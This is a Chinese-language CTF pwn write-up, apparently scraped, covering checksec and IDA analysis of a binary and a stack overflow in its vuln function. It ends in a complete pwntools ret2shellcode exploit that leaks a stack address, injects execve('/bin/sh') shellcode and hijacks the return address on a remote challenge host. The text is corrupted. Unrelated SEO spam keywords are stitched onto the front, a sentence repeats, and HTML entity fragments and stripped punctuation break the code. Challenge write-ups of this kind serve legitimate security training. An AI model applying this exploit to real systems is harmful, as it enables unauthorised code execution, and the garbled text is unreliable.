苏宁易购网站建设建议,推广方法视频,好的免费网站建站平台,2345网址导航浏览器主页老规矩file#xff0c;checksec一下呢先使用AI辅助学习这一块所以这题搞栈溢出就好啦#xff0c;毕竟NX disabled#xff0c;no canary found了嘛。如果再进一步更熟练的话#xff0c;发现pie enabled就有预感这题用什么了ida看一眼跟进hello#xff0c;屁用没有。再跟进g…老规矩filechecksec一下呢先使用AI辅助学习这一块所以这题搞栈溢出就好啦毕竟NX disabledno canary found了嘛。如果再进一步更熟练的话发现pie enabled就有预感这题用什么了ida看一眼跟进hello屁用没有。再跟进gift第一眼格式化字符串但v1是固定字符串无法被篡改所以放弃。先不急再看眼vuln0x3032此处存在栈溢出漏洞。且空间足够大所以走ret2shellcode代码贴在这from pwn import * context(archamd64,oslinux,log_levelinfo,terminal[tmux,splitw,-h]) premote(challenge.imxbt.cn,31103) p.recvuntil(bcherish her :) stack_leakint(p.recvline().strip(),16) buffer_addrstack_leak-0x1c shellcode asm( /* execve(/bin/sh, NULL, NULL) */ xor rsi, rsi mul rsi push rax mov rbx, 0x68732f2f6e69622f /* /bin/sh */ push rbx mov rdi, rsp mov al, 59 syscall ) log.info(fShellcode length:{len(shellcode)}bytes) payloadb payloadshellcode payloadbA*(0x28-len(shellcode)) payloadp64(buffer_addr) p.send(payload) p.interactive()